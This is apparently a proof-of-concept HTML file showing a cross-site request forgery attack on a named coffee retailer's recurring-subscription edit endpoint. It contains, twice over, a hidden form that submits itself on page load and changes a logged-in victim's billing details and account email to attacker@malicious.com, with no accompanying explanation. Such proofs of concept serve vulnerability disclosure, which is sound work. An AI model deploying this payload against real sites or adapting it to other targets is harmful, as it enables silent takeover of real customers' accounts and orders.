omerxx/POC-colonna.html

## POC-colonna.html
    <form method='POST' action='https://colonnacoffee.com/tools/recurring/customers/<RECURRING CUSOMTER HASH>/edit' target="csrf-frame" id="csrf-form">
      <input type='hidden' name='billing_first_name' value='John'>
      <input type='hidden' name='billing_last_name' value='Dow'>
      <input type='hidden' name='billing_address_1' value='33 Flower Hill'>
      <input type='hidden' name='billing_address_2' value='Flat 3'>
      <input type='hidden' name='billing_company' value=''>
      <input type='hidden' name='billing_country' value='United Kingdom'>
      <input type='hidden' name='billing_province_state'>
      <input type='hidden' name='billing_city' value='London'>
      <input type='hidden' name='billing_postalcode' value=''>
      <input type='hidden' name='email' value='attacker@malicious.com'>
      <input type='hidden' name='billing_phone' value=''>
    <input type='submit' value='submit'>
    </form>
    <script>
      document.getElementById("csrf-form").submit()
    </script>
	<form method='POST' action='https://colonnacoffee.com/tools/recurring/customers/<RECURRING CUSOMTER HASH>/edit' target="csrf-frame" id="csrf-form">
	<input type='hidden' name='billing_first_name' value='John'>
	<input type='hidden' name='billing_last_name' value='Dow'>
	<input type='hidden' name='billing_address_1' value='33 Flower Hill'>
	<input type='hidden' name='billing_address_2' value='Flat 3'>
	<input type='hidden' name='billing_company' value=''>
	<input type='hidden' name='billing_country' value='United Kingdom'>
	<input type='hidden' name='billing_province_state'>
	<input type='hidden' name='billing_city' value='London'>
	<input type='hidden' name='billing_postalcode' value=''>
	<input type='hidden' name='email' value='attacker@malicious.com'>
	<input type='hidden' name='billing_phone' value=''>
	<input type='submit' value='submit'>
	</form>
	<script>
	document.getElementById("csrf-form").submit()
	</script>